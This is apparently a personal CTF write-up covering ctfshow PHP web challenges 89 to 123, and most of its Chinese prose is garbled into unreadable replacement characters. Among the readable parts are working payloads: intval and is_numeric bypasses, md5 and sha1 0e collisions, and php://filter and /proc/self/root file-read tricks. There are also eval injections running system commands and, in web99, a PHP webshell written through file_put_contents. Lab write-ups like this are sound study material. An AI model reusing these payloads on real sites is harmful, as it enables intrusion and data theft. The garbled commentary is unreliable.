CTFshow_web_PHP

2024-02-07

CTF

CTF basics, ctfshow

89-150

Q&A

web94��ʹ��2076+2400û�л��ԣ�intval��ǿ��Լ��
web96�е��⡪��
web102��ι��<?=`cat *`;��
web107��Ĳ��Ǽ�ֵ��ʽ��ô��
1. ��ǿ��Ե�
web109��payload2��⣬��
web109��payload3Ҳ��
web109��eval��?>��
web111��Ϊʲôֻ�ܻ�ȡһ��ļ��
web112��Ϊʲô�޷�ʹ��ִ��
1. php://filter��Ҳ��http|https|data|input|rot13|base64|string��Щ��
web113��Ϊʲôcompress.bzip2://file.bz2��У��compress.zlib://flag.php��
1. �ο��
web113��/proc/self/root�ɹ�ԭ��
1. ��ܴ��ĳ��
2. is_file()��?
web125��˼·��ô�в�ͨ
web128��ĸrce
web129�е�Զ��ļ��ʲô
1. payload2�е��ʾ
web129��payload3�е�Ŀ¼��Ŀ¼��Խ©��
1. ��
web131��ƥ��̰��̰��ݵ��
1. ��̰��
2. ̰��p�񡪡�PHP��PCRE��ݴ��ƹ�ĳЩ��ȫ��
web132��ô��غõ��Ǵ򲻿�
web133
1. ��Ƴ��ִ��
2. ��shell
web133��web134�б��ǵ��߼��
web133��ж��ֽⷨ
web134��
url��decode1�Σ�copilot��ô˵�ǳ��׽��
nc��wget��bash��sh��netcat��nc��od��tailf��strings��ʲô��
web136�е��
web138��echobutΪʲô��Ҫ��Դ��
web139äд�ű�

web89(intval��)

��

intval��͵�ת��⣬��һȦ��ƹ��ƹ�preg_match()
payload��?num[]=green

php��Բ��֪ʶ��

get��ʽ��δ��ַ�ʽ
1. ʹ�ö��ͬ�ļ��URL�ж��ʹ��ͬ�Ĳ��ÿ�δ��һ��Ԫ�ص�ֵ��Ὣ��Щֵ��Ϊһ��飺?colors=red&colors=green&colors=blue
2. ʹ��[]��ڲ��[]��Ȼ��ֵ��Ϊ��ֵ��ݣ�?colors[]=red&colors[]=green&colors[]=blue
preg_match��preg_match_allƥ��ʱ��preg_match()�� FALSE

web90(intval+ǿ�Ƚ�)

��

��Ŀ֪��Դ��ַ��ƴ��ģʽ��ߴ�С��ģʽ��ƹ�
payload1��?num=4476.6
payload2��?num=4476h
payload3��?num=010574
1. ʹ�ð˽��ƽ��ƹ�

php��Բ��֪ʶ��

web90��ǿ�Ƚ��е�4476��ַ��Ϊʲôֱ��4476nonono��’4476’��0��
1. �ش�url�н��get��ʱ��Զ��˫��ţ��?num=’4476’ʵ��’'4476'‘��

web91(��ʽ��η�)

��

��Ĺؼ��m��⣬chatһ�º��ֽ��ؼ�
payload��?cmd=%0aphp
1. ʹ��maxhackerbarһֱ��because��ٽ��һ��url��%0a��%250��
payload2��?cmd=php%0aphp

php��֪ʶ�㲹��

url��е�get��ʽ�е��ַ�ʹ�õ��url��룬��绻�з�ʹ�õ��%0a��\n
1. ת��ַ�\n�ķ�ʽ��ڱ��ʵ��
2. url�д��ַ�Ҳ�ᱻ��ƥ��ǣ��ǲ��ɼ��ַ��Ͳ��
��Ŀ��ϸһ�㣬php��Ŀ�ص��ԣ��/��ľ��ص�

web92(intval+��Ƚ�)

��

��Ŀ��Ժ�web90��Աȣ�web90��ǿ�Ƚϵģ��Ƚϵ�
��ͨ��һ�ֲ��ַ��ƴ�ӣ�but��С��߽��
payload1��?num=4476.6
payload2��?num=0x117c
1. ע��ת��ʱ��ֱ��4476hex decode��hex encode��Ӧ��4476��16��Ʊ�ʾ��4476ȥת��
payload3��?num=4476e123
1. intval��ῴ��ѧ��ת��

php��֪ʶ�㲹��

��ֹ��intval�У��ڱȽ��лῴ��ǿ��ת��ַ��(int)�Ƚ�ʱ��Ὣ�ַ��ת��Ϊ��
1. ��ַ��а��ַ��ת��Ǵ��ҵ�һ��ַ�ǰ��ֲ��
2. �ַ��еĵ�һ��ַ��ֻ�+-��ת��Ϊ 0
3. ��ַ��ʾ��ķ�Χ��򽫱�ת��Ϊ��С��ֵ��ȡ��Ƿ񳬳��˷�Χ��޻��ޣ�
4. �հ׷��intval��һ��

web93(ͬweb92)

��

��web92�Ļ��Ϲ��ĸ��but��ʹ�ð˽��ƺ�С��
payload��?num=4476.6
payload2��?num=010574
1. ʹ�ð˽��ƹ�

web94(strpos()+ǿ�Ƚ�)

��

��ǵ�strpos��ص��ֵ��ֲ��ܳ��ĸ��ʮ��ƶ��ƿ�ѧ��ƴ�Ӷ�ûϷ��
�˽��ƺ�С��㷨��ȡ��Ӽ��
payload��num=+010574
1. ʹ�ð˽��Ʒ��Ӷ�һ��+�Ų�Ӱ��ҿ��Է��Ϊ1
payload2��?num=4476.0
1. С��㷨��ǿ�Ƚ�
payload3��?num=4476%0a
1. ʹ�û��з��ˣ�Ҳ��ǿ�Ƚϲſ��
payload4��?num=%0a010574��?num=%20010574
1. ��ÿհ׷��ǿ�ƹ�ͬʱ��0

web95(ͬweb94+.��)

��

ͬ��Ľⷨ��but��΢�е㲻ͬ��because��һ��Ƚ�
�հ׷��
payload1��?num=+010574��%2b010574��?num= 010574��һ��հ׷��
1. �ڶ��%2b��url��ѣ��û��ɶ

web96($_GET[]�Ƚ�+highlight_file)

��

�ȽϺ�preg_match��ǲ�ͬ��
payload��?u=./flag.php��/var/www/html/flag.php
payload2��?u=php://filter/read=convert.base64-encode/resource=flag.php

��

?u=hex2bin(22666c61672e70687022)��У��ᱨ��
?u=$_GET[‘b’]&b=’flag.php’Ҳ��У��ǲ��ʾnonono
Ƕ��ƹ��л�ֱ�Ӵ��뻹��ֻ��ʱ�Ŵ��
ʹ��globƥ��current()�ȵȶ��

php��Բ��֪ʶ��

ǿ��ȽϺ�preg_replace��preg_match�ǲ�ͬ��

web97(md5ǿ�Ƚ�)

��

md5ǿ�Ƚ�ʹ��ƹ�
payload��a[]=1&b[]=2
ע��post��

php��Բ��֪ʶ��

php��Ƚϻ�Ƚ��ֵ

web98(http��ͷ)

��

web99(ľ��/rce�ַ��д��+��Ƚ�)

��

��һ��ʼ��Ժ��һ��
д��ݵĻ��û��ʹ��file_get_contents��ﲻ��eval��ֱ�ӵ��ַ��
in_array��ϸ�ģʽ��ǿ�Ƚ�?��ͨģʽ��Ƚ�?
��Ƚϵ��ƹ�
payload��
1. post��content=<?php eval($_POST[‘shell’]) ?>
2. get��u=1.php
payload2��
1. post��content=<?php system(‘ls’) ?>
2. get��u=1.php
3. Ȼ��ˢ�¼��Ϳ��ˣ��ִ��

php��֪ʶ�㲹��

��ĿԴ��

0x36d��877
array_push()
1. ��ԭ�ͣ�array_push(array &$array, mixed $value1 [, mixed $… ])
2. ��ֱ��Ͻ��в��
in_array()
1. ��ԭ�ͣ�in_array(mixed $needle, array $haystack, bool $strict = false): bool
  1. mixed $needle: ��衣Ҫ��ֵ
  2. array $haystack: ��衣��
  3. bool $strict��Ǳ��롣true��Ϊ�ϸ�ģʽ(ǿƥ��)��Ϊ��ƥ��
2. ��β��Ԫ��
file_put_contents()
1. ��ԭ�ͣ�file_put_contents(string $filename, mixed $data, int $flags = 0, resource $context = null): int|false
  1. string $filename: ��衣Ҫд��ݵ��ļ��
  2. mixed $data: ��衣Ҫд��ļ��ݣ��ַ��߿�ת��Ϊ�ַ��κ��(but��ļ�·��У�ֱ�ӵ��ַ��)
2. ��ֵ��д��ļ��ֽ��ʧ��򷵻� false
rand()
1. ��ԭ�ͣ�rand(int $min, int $max): int
  1. ��ʾ��Ƿ�Χ
  2. ��Ҫʹ��srand()�ṩ��ǲ��б�
2. ��α��Ҫ�ṩ��Ӹ�srand()��ṩ��ӣ�rand() ��ʹ�õ�ǰʱ��ΪĬ��ӣ�ÿ�β��᲻ͬ

highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) { 
   array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
   file_put_contents($_GET['n'], $_POST['content']);
}

php��ַ��ĵط��޷�ֱ��ʹ�ú��because��ִ�У�ֻ�ᵱ��ͨ��ַ��
��д��ľ��Ļ��õ�
1. ��ַ��ĵط��ļ�ϵͳ��Կ��ľ��phpľ��Ҫ��php�ļ�ʹ��(��Ƚ��)

web100(��ȼ�)

��

�Ӹ�gtp��æ��һ��
flag��У��鿴һ��
payload��?v1=1&v2=var_dump(get_class_vars&v3=);��flag_is_55ae8de70x2dfcb50x2d40610x2d881d0x2d2a2ee86c3df0��һ��0x2d(-)��Ƚ��⼸��һ�º��ֲ��ּ��ctfshow{}��ͨ��
payload2��?v1=1&v2=system(“cp+ctfshow.php+1.txt”)?>&v3=;Ȼ��ٷ��1.txt��
1. ֱ�ӿ�ʼ��ִ��
2. ��ȡctfshow.php��ݣ�because��ݵ��ȡ
3. ��ƶ�һ�£�ctfshow.php��п��ܾ��ctfshow��
payload3��?v1=21&v2=var_dump($ctfshow)/*&v3=*/;
1. var_dump(��)�� MyClass ��Ķ��Ϣ��Ժͷ��but��ܵ��ڲ��ԵĿɼ��Ӱ��private
2. ʹ��ע��/**/��ȥ��Ҳ��һ��Ҫ��˼��
payload4��?v1=1&v2=echo new ReflectionClass&v3=;
1. ʹ�÷��в�ѯ

php��֪ʶ�㲹��

$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);��ȼ��
1. �߼��and��or��ȼ��ڸ�ֵ��=��but�߼��&&��||ӵ�бȸ�ֵ��=��ߵ��ȼ�
2. ��У�$v0 �� is_numeric($v1) �Ľ��Ȼ�� is_numeric($v2) �� is_numeric($v3) ��߼��㣬��ͬ��
  1
  ($v0 = is_numeric($v1)) and is_numeric($v2) and is_numeric($v3);

��ȡ��Ϣ

��ʹ�÷��

��echo new ReflectionClass(class_name);
1. ��Ҫʹ��echo��һ��Ժͷ��
2. ʹ��var_dump�Ļ�ֻ��
echo�Ļ��
1. �� Contants
2. �� Property Names
3. �� Method Names��̬
4. �� Static Properties��̬
5. ��ռ� Namespace
6. Person��Ƿ�Ϊfinal��abstract
7. Person��Ƿ��ĳ��

//��������
$a = new ReflectionClass('Classname');

//���������ƣ������ַ���
echo $a -> getName();

//��ȡ��ĸ���
$b = $a -> getParentName();
if($b){
   echo $b -> getName();
}else{
   echo "no parent class";
}

//��ȡ������ԣ����ع�������
var_dump(($a -> getProperties()));

//��ȡ��ķ��������ع�������
var_dump(($a -> getMethods()));
# ��ķ���ֻ�����Ӧ�����ƣ���û����Ӧ��ʵ������

get_class_vars(string class_name) array
1. Ҫ��var_dump()�ȴ�ӡ��
get_class_methods(object|string class_name) array
1. Ҳ�Ƿ��飬Ҫ��var_dump�Ƚ��ʹ��
get_class(object) string
1. ��ֵ��һ��ַ��ʾ��
Ҳ��Ժ�payload2һ��ȡ��class��ļ��ʹ��ִ��

ȥ��
1. ʹ��/**/��ע�ͣ��payload3
2. ʹ��?>��payload2
��Ҫȫ�棬ÿ��䶼��Ҫ��еĻ��в��õ��׺��(��û��д��ȼ�)

web101(web100+��)

��

��ʹ�÷��У�payload��?v1=1&v2=echo new ReflectionClass&v3=;

php��֪ʶ�㲹��

preg_match(“/\\|/|~|`|!|@|#|\$|%|^|*|)|-|_|+|=|{|[|"|'|,|.|;|?|[0-9]/“, $v2)
1. ʹ��ĸ�\ƥ��\��because��php��\Ҳ��ת��ַ��Ҫ��ʾһ��\��Ҫͨ��\ת��
2. Ϊ��ʽ��һ��б��ַ��Ҫʹ��б��ʾһ��б��(��ʽ��ᰴ��Ҳ��ǿ��)

web102(��ص�)

��

v2һ��Ҫ��֣��ǰ��һ��e��
v3��Ҫд��ļ��
v1��Դ��Ҫ��õ�һ��Ĳ��ʹ��v2��ȡ��
payload��
1. get��?v3=php://filter/write=convert.base64-decode/resource=1.php&v2=115044383959474e6864434171594473
2. post��?v1=hex2bin

php��֪ʶ�㲹��

is_numeric()
1. ��ԭ�ͣ�is_numeric(mixed $value): bool
  1. �ж��ֺ��ַ��
  2. ��ʹ��16��Ƶ��ƣ�ֻ��ʮ��
  3. 123a�ж��false��ѧ��(e��ȫ��)��Ϊ��һ��e�ĳ��
2. ��php5�Ļ��16��Ƶģ�php5��ϲ��
substr()
1. ��ԭ�ͣ�substr(string $string, int $start, ?int $length = null): string|false
  1. $start: ��衣��ʼ��ȡ��λ�á��Ϊ��ʾ��ַ��ĩβ��0��ʼ
  2. $length: ��δָ��Ǵ�start��ĩβ��ַ��Ϊ��ʾ��ȡ�ĳ��
call_user_func()
1. ��ԭ�ͣ�call_user_func(callable $callback, mixed $parameter, mixed $…)
2. $callback: ��衣��ʾ�ص��Ŀɵ��͵Ĳ��
  1. ��һ��ַ��
  2. һ��飨��һ��Ԫ��Ƕ��ڶ��Ԫ��Ƿ��
  3. ��һ��
3. parameter, $…: ��ѡ��Ҫ��ݸ��ص��Ĳ��Ļ��鼴��
4. ��ֵ��ִ��ָ��Ļص��䷵��ֵ��ִ��ʧ�ܷ��false
˼·�ؿ�
1. ʹ�ò�ͬ��16��ƺ�8��ƣ��Ӧ�ĺ��hex2bin()��ֺ��ַ��ͬʱʹ��
payload��
1. php:filter��д��ԶԶ�ȡ��ļ��Ŷ��д��ļ��ص��봦��
  1. д��ļ��Ļ��Զ��ļ��߽��и��
  2. ��v3��д��ļ��һ�α��/��봦��
2. ��ؽ��˼·
  1. Ҫȫ��Ϊ��֣��ʹ��hex(base64��̫ʵ��)��У�butСд��ĸascii��81��(99Ϊ��ʹ��ֵ�ʮ��Ʊ�ʾ)
  2. 81��ǰ��=+�ʹ��д��ĸ��ʹ��base64��Ŀ��ԣ��ʹ��php://filter��κ��д��
  3. ��ʹ��hex��base64��빲ͬ��ϣ��ƥ��ֺ��ַ��
3. ��hex��Ե��->û��Ǽ��д��ĸ��base64��
  1. ��ۣ�?=`cat *`;��Ŀ¼��ļ��һ��Ҫʹ��cat flag.php

web103(ͬweb102)

��

��ʹ��һ��ķ��⣬��php7��û��
payload��(php7��)
1. post��v1=hex2bin
2. get��?v3=php://filter/write=convert.base64-decode/resource=1.php&v2=115044383959474e6864434171594473

php��Բ��֪ʶ��

��php5��Կ��phtml��ľ��ִ��rce

web104(sha1��)

��

��Ƚϴ��0e��ײ�ͺ�
payload��v1=aaO8zKZF��v2=aaK1STfY

php��Բ��֪ʶ��

��û��Ҫ��ȣ��һmd5��sha1��ڵ��ƹ��ǽ��Ҫ��ȵĻ��ϣ��Ҫ��ɵ��

web105(��)

��

��byd��һ��Ҫ��wp��
�Ǳ��ǣ�һ��ʼ��include��$flagʹ��error��suces�ģ��Ǻ��ˣ��Ǵ��빦�ײ��
��˼·��
1. ��һ��Ҫ��ĵط��Ҳ��die($error)��$$��õ��
2. suces��error��ȫ�ֵı��ʱ�̴��
3. �Ƚ�suces��Ϊflag(��Ĳ�û��ֱ��ʹ��flag��ֵ)
4. �ڽ�error��Ϊsuces
payload��
1. GET: ?suces=flag
2. POST: error=suces

php��Բ��֪ʶ��

��˼·��
1. ʹ��cookie[]but��û��$$��ȫ�ֱ��
2. post�н�flag��Ϊ$flag(ʵ��Ԥ�ϵ��Ĳ��suces��еģ�but��پ��Ǵ��뵽��suces��)
��˼
1. $$��÷�ʵ��Ĳ�ȫ
2. ��뵽�ĵ�Ҫ��Ҫ�뵱Ȼ��Ϊû�ã��ˣ��suces��error��Ӧ��
3. ��֪ʶ�㣬��ĵط��ʹ�ñ��Ҫ��ݣ��һ��echo $flag�ĵط�
��
1. get��postָ��Ӧ��

web106(��web104+sha1��Ƚ�)

��

��v1��v2��
payload��v1=aaO8zKZF v2=aaK1STfY

web107(parse_str)

��

�ؼ��parse_str()��֪ʶ�㲹�伴��
payload��
1. get��?v3=QNKCDZO
2. post��v1=flag=0e830400451993494058024219903391
3. v1ֱ��ʹ��0Ҳ��ԣ��md5��ײ
payload2��
1. get��?v3[]=1 ��ж�Ϊnull
2. post��v1=1=0��v1=1 û��flag�򲻷��ϼ��ֵҲ��null

php��֪ʶ�㲹��

parse_str()

��ԭ��void parse_str ( string $str , array &$array )

$str��Ҫ��Ĳ�ѯ�ַ��
$array��ѡ��ṩ��ı��洢��С��ṩ��ı��ӵ��ǰ�ķ��ű��У��Ӧ�ı��
��ã��ѯ�ַ��ת��Ϊ��ѯ�ַ��еļ�ֵ�Խ��Ϊ��Ӧ�ı��ͱ��ֵ

$query = "name=John&age=30&city=New+York";
// ������ѯ�ַ���������
parse_str($query, $params);
// ��������������
print_r($params);
/*���
Array
(
   [name] => John
   [age] => 30
   [city] => New York
)
*/

��
1. ��ֵ�Էָ��ֵ��֮��ʹ�� & ��ŷָ�(�ʺ��get��ʽ��post��ʽ��д��)
2. ��ֵ��ţ��ֵ֮��ʹ�� = ��ŷָ�
3. ��ֵ��е�ת�壺��ֵ�е��ַ��ᱻת�塣�� URL ��ѯ�ַ��˵��ת��ַ�� &��=��ո�ȣ��ǻᱻת�� %26��%3D��+ ��ʽ
4. ��򣺼�� PHP ��Ĺ��򡣾��˵��ֿ�ͷ��ܰ��ո��ַ�� _ �� -�� PHP ��
5. ��ʽ�ļ��ѯ�ַ��еļ��ʹ��˷�� []�� parse_str() �Ὣ��ʶ��Ϊ��ʽ�ļ��Ӧ��ֵ��Ϊ��
6. ��ͬ��Ĵ��ѯ�ַ��ͬ�ļ��parse_str() �Ὣ��ǽ��Ϊ��ʽ

web108(ereg%00�ض�)

��
php��Բ��֪ʶ��

ereg()
1. ��ԭ�ͣ�int ereg ( string $pattern , string $string [, array &$regs ] )
  1. $pattern��Ҫƥ��ʽģʽ
  2. $string��Ҫ��Ŀ��ַ��
  3. $regs��ѡ��ڴ洢ƥ��
2. ��ã��preg_match��
3. ��ֵ��
  1. �ɹ�ƥ�䣺��ʾƥ��ɹ��λ�ã��ƥ�䵽��ַ��ʼλ�ã�
  2. ��ƥ��ʧ�ܣ��򷵻��
4. ע��
  1. ereg() �� PHP 5.3.0 �汾�б��Ϊ��ʱ�� PHP 7.0.0 �汾��Ѿ��Ƴ�
5. �ƹ�
  1. Ҫ��ַ��᷵��null��null !== false
  2. ereg�� %00 ��ʱ��ͽ�ֹ��ʹ��%00�ض�
strrev()
1. ��ԭ�ͣ�string strrev ( string $string )
2. ��ã��ַ��
3. ��\x00��\0��нضϴ��ǿ��Խ��(˫��)��ǲ��ɽ��(��)
4. ��򷵻�NULL��ƹ�
php��null�ַ�
1. \0��\x00��php��ʾnull�ַ��ascii��Ϊ0�ַ�->��ַ�
2. ��ת��ַ��е�һ�֣��Ҫ��˫��
3. add��php��null !== false
php�еĵ��ź�˫��
1. ˫��
  1. ˫��еı��ᱻ��滻Ϊ��Ӧ��ֵ
  2. ˫��е�ת��ַ��ᱻ��Ӧ�ĺ��
    1
    2
    3
    4
    5
    6
    7
    8
    echo "hello\nworld";
    /*��
    *hello
    *world
    */
    
    echo 'hello\nworld';
    //�� hello\nworld
2. ��
  1. ��
  2. ��ת��ַ�
��php�У�ʹ�õ��Ż�˫��ַ��’0x36d’��ʱ��Ϊ0��but��ַ��ƻᱻ��Զ�ת��ʮ��ƣ��0x36d
1. ��н��бȽϵ��

web109(��ִ��+eval��)

��

ʹ��//��нضϣ�payload��?v1=ReflectionClass(“PDO”);system(“ls”);//&v2=a
1. ʹ��ReflectionClass��Ҫ��ȫ��ͣ�ֱ��ʹ��PDO�Ϳ��ԣ��ж��(��)
2. ʹ��//��ע��
ʹ��ƹ��payload2��?v1=class{ public function __construct(){ system(‘ls’); } };&v2=a
1. ��ֵ��ǲ�ʹ��__construct��û��ִ��
2. �ĳ�?v1=class{ public function __construt{echo “hello world”;} };system(“ls”);//&v2=aҲ�޷�ִ��
3. ��ҿ�ִ�еľ��Ӳ��//
payload3��?v1=ReflectionClass&v2=system(‘ls’)
1. ΪʲôΪʲô
ʹ��쳣�࣬payload3��?v1=Exception;system(“ls”);//&v2=a
1. PHP �ṩ��һ��õ� Exception ��Ϊ��쳣�Ļ��࣬��Ҳ��ͨ��̳� Exception ��Զ��쳣��
2. ��ʹ��쳣��ǰ��쳣��Exception��__toString()��
3. Exception �� __toString() ��һ��ַ��쳣��Ϣ��ļ��кźͶ�ջ��Ϣ

php��֪ʶ�㲹��

˼·��
1. ��ַ��eval��
2. �Ƚ�ԭ��ṹ��бպ�(��new��һ��)
3. Ȼ��Ҫ�ĺ��system
4. Ȼ��ע��//
5. ��ɹ�ִ�е�ǰ��ǲ��б��ҲҪ��ͣ��ص�ֱ��ֹͣ
  1. ��new ĳ��
eval��
1. eval��ַ��Ϊphp��ִ��
2. eval�п��ʹ��//��/**/��ע�ͷ��ź�;�ֺ�
3. eval�п��ʹ��?>
  1. ʹ��?>��php�ű��У�but��ǰ��
  2. ��ִ�� ?> ��Ĵ��룬Ҫִ�к��Ҫʹ��<?��ͷ
  3. �պ��ʹ��?>��()��’”�ƹ�
��ࣺ
1. �汾��php7��
2. ��ã��ڲ��ֱ�Ӵ��һ��ͨ��ʱ��Ҫ��С�Ͷ��󣬶��ר��
3. ��Ŀ�е�ʹ��˹��캯��
4. ʾ��
  1
  2
  3
  4
  5
  6
  7
  8
  9
  $a = new class{
  public function greet(){
  echo "hello world";
  }
  };
  $a -> greet();
  
  //��Ҳ��Լ̳нӿں͸��
  //��Ҫʹ�÷ֺ�
echo new ReflectionClass(“PDO”);
1. ReflectionClass ��ַ��˻ᴥ�� PHP ��Զ��ת��ƣ��Խ��ת��Ϊ�ַ��ʱ��ö�� __toString() ��
2. ��û��__toString()��һ��
��(Reflection)
1. �ο��ף��
2. ��ã��ȡ�ࡢ��ԡ��ע�͵ȷ��Ϣ
3. ��
  1. ReflectionClass ��е��Ϣ
  2. ReflectionFunction ��溯��Ϣ
  3. RefectionException ��쳣��
  4. RefectionMethod ��淽��е��Ϣ
4. �÷�һ��÷��ȡ��ԣ��ͳ��(ǰ��д��)

web110(�ļ�ϵͳ��ʶ)

��

��web109��Ͻ��й��ˣ��ҪѰ��µ��
ctf��Ŀ�ļ�ϵͳ��㣬chatһ��php��ļ�ϵͳ�йص��࣬��һЩ��Ϣ
payload1��?v1=FilesystemIterator&v2=getcwd
1. ��ƹ��ˣ��ԭ�л��ϴ�
2. ע�⣬new ClassName()��Ҳ��һ��빹�캯��ģ��ֻ�к��
3. ȱ�ݣ�ֻ�ܻ�ȡ��һ��ļ��֣�becauseĬ�ϵĵ��Ŀ¼�е��Ŀ��ļ��Ŀ¼��Ҫforeach��ſ��ȫ��ļ��

php��֪ʶ�㲹��

FilesystemIterator��
1. �� DirectoryIterator ��һ��࣬��ڵ��ļ�ϵͳ�е��ļ��Ŀ¼
2. FilesystemIterator ��Ŀ¼�е��Ŀ��ļ��Ŀ¼�� . �� ..��DirectoryIterator ��.��..��Ͳ��ˣ�ֻ�ܻ�ȡһ��ļ��֣�
3. ��ļ�ϵͳ��һ��gtp�Ϳ��
getcwd()
1. ��ڻ�ȡ��ǰ��Ŀ¼��·��û��ָ��·�� getcwd() ��ص�ǰ PHP �ű��Ŀ¼·��
ctf��Ŀ�ļ�ϵͳ��㣬chatһ��php��ļ�ϵͳ�йص��࣬��һЩ��Ϣ
1. ͬ��ѯ�ʣ��ļ�ϵͳ�й��л�ȡ��ǰĿ¼�ĺ��

web111(��)

��
php��֪ʶ�㲹��

Դ��

��
1. ʹ��&��Ŵ��ã��ʾ��Ƕ��
2. ��ú�ԭ��ʼ��ָ��ͬһ��ڴ�ռ䣬��˶��õ��޸�Ҳ��Ӱ��ԭ��ֵ
3. ��ʹ�� unset() ��ɾ��ʱ��ԭ��Ӱ�죬��ý��ָ��ԭ��
4. ��ý��и�ֵ��ᴴ��һ��µı��ã��2��ֻ��޸�һ��

highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

function getFlag(&$v1,&$v2){
   eval("$$v1 = &$$v2;");
   var_dump($$v1);
}

if(isset($_GET['v1']) && isset($_GET['v2'])){
 $v1 = $_GET['v1'];
 $v2 = $_GET['v2'];

 if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v1)){
         die("error v1");
 }
 if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v2)){
         die("error v2");
 }
 
 if(preg_match('/ctfshow/', $v1)){//�涨v1��ֵ
         getFlag($v1,$v2);
 }
}
?>

�ֲ��ȫ�ֱ��
1. ��Ŀ��?v1=ctfshow&v2=flag��û��$flag��ֵ�ģ�ԭ��
  1. $flag��Ȼ��flag.php�еģ��ǲ��ȫ�ֱ��û��ں��ʹ��
  2. ��Ҫʹ�÷�ȫ�ּ��̬��Ҫ��뺯��
2. ��ʹ��ȫ��(�ؼ��)��ƹ�
  1. $GLOBALS��ȫ�ֱ��ȫ��
  2. $_FILES��ͨ��ļ��ϴ��ϴ��ļ��Ϣ
  3. $_ENV��˵�ǰ��еĻ��
  4. $_SESSION��ڴ洢��ǰ�Ự�еĻỰ��
  5. $_COOKIE��cookie�е��
3. ��ȫ�ֱ��
  1. ��ɲ��ϵͳ��õģ��ڲ�ͬ�Ľ��֮�䴫��Ϣ��ͨ��һЩϵͳ��Ϣ��û��
  2. ȫ�ֱ��ȫ�ֱ�� PHP �ű��ж��ı��ڽű��κεط��

web112(is_file+highlight_file)

��

is_file()��highlight_file()ͬʱ��֣��ȿ��һ��php://filter
1. �鿴��˵is_file(“php://filter”)��ļ��false��Կ��
2. ��һ��ԭ��ǽ��õĹؼ��˷��(��ͷ)
payload��?file=php://filter/read=convert.iconv.utf-8.gbk/resource=flag.php
1. ʹ�øı��ģʽ��convert.iconv.utf-8.gbk��
payload2��file=php://filter/resource=flag.php
1. ֱ��ʹ��û�й��filter
payload3��file=php://filter/read=convert.quoted-printable-encode/resource=flag.php
payload4��file=compress.zlib://flag.php
1. ʹ��ѹ��

php��Բ��֪ʶ��

˼·��ʹ��ִ��ls > 1.txtΪʲô�в�ͨ

web113(ͬweb112+��filter)

��

��Ȼ��αЭ��
payload��?file=compress.zlib://flag.php
1. �˴�ʹ��ǽ�flag.php->flag.gz
payload2��/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/p
roc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/pro
c/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/
self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/se
lf/root/proc/self/root/var/www/html/flag.php
1. ��ú��ܴ��ĳ��ƽ��Ŀ¼��
2. /proc/self/root��Ǹ�Ŀ¼��֪��վĿ¼��/var/wwww/html/

php��Բ��֪ʶ��

linux:/proc/self/root
1. /proc/self/root Ŀ¼��һ��ӣ�ָ��ǰ��̵ĸ�Ŀ¼
2. ��·��ʱ��ʵ��ʾ�˸�Ŀ¼��ݡ��ͨ��ڸ��Ŀ�ģ��ƹ�ĳЩ��ȫ��ϵͳ�ļ�
is_file()
1. is_file()��ж�һ��·��Ƿ��һ��ͨ�ļ�
2. ��·��ָ��һ��Ŀ¼��һ��ļ��豸�ļ��ӣ��is_file()��᷵��false

web114(php://filter��ù��)

��

��ˣ��ǿ��ʹ��php://filter/resource=flag.php
payload��php://filter/resource=flag.php

web115(is_numeric��+trim+fuzz)

��

�鿴һ��trim��\x0cû�б��
�ٲ�һ��is_numeric��php7�Ŀհ��ַ�ǰ�÷��true
php7��ַ�ת��Ļ�ǰ�ÿհ��ַ�Ҳһ��
payload��?num=%0c36
1. php�汾bpץһ�¾ͺ�
2. 36E2�ǲ��Եģ�because��Ƚ��Ȼ��

php֪ʶ�㲹��

�޴��ʱ�Ȳ�һ��ԣ��֪�Ǵ��幦�ܣ�Ҫ��壬��˲�֪��trimû�й��\x0c
is_numeric()��
1. php8.0.0��Կո��β��ַ��”42 “��ڽ�� true��ǰ��᷵�� false
2. php7�д��ǰ��ַ��Կո�ͷ��ж�Ϊtrue
3. is_numeric��ڿ��ַ�%00��%00��ǰ�󶼿��ж�Ϊ��ֵ��%20�ո��ַ�ֻ�ܷ��ֵ��
trim()
1. ��ã�ȥ��ַ��β��Ŀհ��ַ��ַ��
2. �հ��ַ��û��\x0c��й��
ǿ��ת��
1. �� PHP 7 �У��ַ��ֵ�ַ��Ч��ʽ��ʼ��ǿ��ת��Ϊ��Ľ�� 0��֮ǰһ��
2. ��ǿ��ת��Ϊ�� PHP 7 �У��ַ��˷��ֵ�ַ��Ч�ĸ��ʽ��ʼ��ת�� NaN��֣�
��Ƚ�
1. ��ǿ��ת��ͬ
2. �� PHP 7 �У��ͱȽϣ��ʹ��˫�Ⱥ� == ��бȽϣ��᳢�Խ��ת��Ϊ��ֵ��ַ��ת��Ϊ��֣�Ȼ��бȽϣ��ʴ��

fuzz��ʹ��

��Բ�һ��Ҫ4��һ��㣬��Էſ�+��
ע��һ��url��

//script1
<?php
for($i = 0; $i<129; $i++){
   $num=chr($i).'36';
   if(trim($num)!=='36' && is_numeric($num) && $num!=='36'){
      echo urlencode(chr($i))."\n";
   }
}
?>
//��Ҫ�ڶ�Ӧ��php�汾�½���

//script2
for ($i=0; $i <=128 ; $i++) { 
$x=chr($i).'1';
   if(trim($x)!=='1' &&  is_numeric($x)){
      echo urlencode(chr($i))."\n";
   }
}
//��һ��trim��is_numeric

web123(php��)

��

˼·һ��Ƕ��ƹ��payload��
1. get��?$fl0g=flag_give_me;
2. post��CTF_SHOW=&CTF[SHOW.COM=&fun=eval($a[0])
  1. ��ʹ�õ��Ż�˫��Ž� php ��ֱ��д php��ôPHP�Ὣ��Ϊ��ַ��ͨ��£�� php δ��壬PHP�Ὣ��Ϊ�ַ�� ‘php’ ��ǻᷢ��һ��(��ǲ��ֹͣ��)
3. ��
4. get��?$fl0g=”flag_give_me”;
